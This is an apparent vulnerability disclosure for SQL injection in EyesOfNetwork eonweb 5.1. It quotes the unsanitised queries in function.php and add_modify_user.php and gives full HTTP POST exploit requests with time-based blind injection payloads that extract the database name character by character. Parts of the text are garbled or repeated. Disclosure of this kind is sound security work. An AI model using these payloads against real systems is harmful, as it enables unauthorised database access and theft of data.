eonweb_include_function

powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 745

// Check if user exist
    $user_exist=mysqli_result(sqlrequest("$database_eonweb","SELECT count('user_name') from users where user_name='$user_name';"),0);

$user_name has not been filtered to cause injection

/srv/eyesofnetwork/eonweb-5.1/module/admin_user/add_modify_user.php Line 268

if  (isset($_POST['add']))
    {   
    $create_user_in_nagvis = retrieve_form_data("create_user_in_nagvis","");
    $create_user_in_cacti = retrieve_form_data("create_user_in_cacti","");
    if($create_user_in_nagvis == "yes"){ $nagvis_user = true; }
        else { $nagvis_user = false; }
        if($create_user_in_cacti == "yes"){ $cacti_user = true; }
            else { $cacti_user = false; }
                
                $user_group = retrieve_form_data("user_group","");
                $nagvis_grp = retrieve_form_data("nagvis_group", "");
                $user_id=insert_user(stripAccents($user_name), $user_descr, $user_group, $user_password1, $user_password2, $user_type, $user_location,$user_mail,$user_limitation, true, $create_user_in_nagvis, $create_user_in_cacti, $nagvis_grp, $user_language);

EXP:

POST /module/admin_user/add_modify_user.php HTTP/1.1
Host: 192.168.91.66
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 218
Referer: https://192.168.91.66/module/admin_user/add_modify_user.php
Cookie: session_id=104554405; user_name=admin; user_id=1; user_limitation=0; group_id=1
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=&user_name=123%27+or+sleep(if(ascii(substr(database(),1,1))=101,0,5))%23 &user_name_old=&user_mail=&user_descr=admin&user_password1=admin&user_password2=admin&user_language=0&user_group=1&nagvis_group=3&add=add

term=%' and sleep( if(ascii(substr(database(),1,1))=102,0,5 )) %23

The page will be delayed for 5 seconds

term=%' and sleep( if(ascii(substr(database(),1,1))=101,0,5 )) %23

The page will be delayed for 0 seconds

0x02

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 769

sqlrequest("$database_eonweb","INSERT INTO users (user_name,user_descr,group_id,user_passwd,user_type,user_location,user_limitation,user_language) VALUES('$user_name', '$user_descr', '$user_group', '$user_password', '$user_type', '$user_location', '$user_limitation', '$user_language')");

'username′,′user_descr', 'usergroup′,′user_password', 'usertype′,′user_location', 'userlimitation′,′user_language' has not been filtered to cause injection

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 770

$user_id=mysqli_result(sqlrequest("$database_eonweb","SELECT user_id FROM users WHERE user_name='$user_name'"),0,"user_id");

$user_name' has not been filtered to cause injection

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 771

$group_name=mysqli_result(sqlrequest("$database_eonweb","SELECT group_name FROM groups WHERE group_id='$user_group'"),0,"group_name");

$user_group' has not been filtered to cause injection

EXP:

POST /module/admin_user/add_modify_user.php HTTP/1.1 Host: 192.168.91.66 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 218 Referer: https://192.168.91.66/module/admin_user/add_modify_user.php Cookie: session_id=104554405; user_name=admin; user_id=1; user_limitation=0; group_id=1 X-Forwarded-For: 127.0.0.1 Connection: close Upgrade-Insecure-Requests: 1

user_id=&user_name=123%27+or+sleep(if(ascii(substr(database(),1,1))=101,0,5))%23 &user_name_old=&user_mail=&user_descr=admin&user_password1=admin&user_password2=admin&user_language=0&user_group=1&nagvis_group=3&add=add ``` term=%' and sleep( if(ascii(substr(database(),1,1))=102,0,5 )) %23

The page will be delayed for 5 seconds

term=%' and sleep( if(ascii(substr(database(),1,1))=101,0,5 )) %23

The page will be delayed for 0 seconds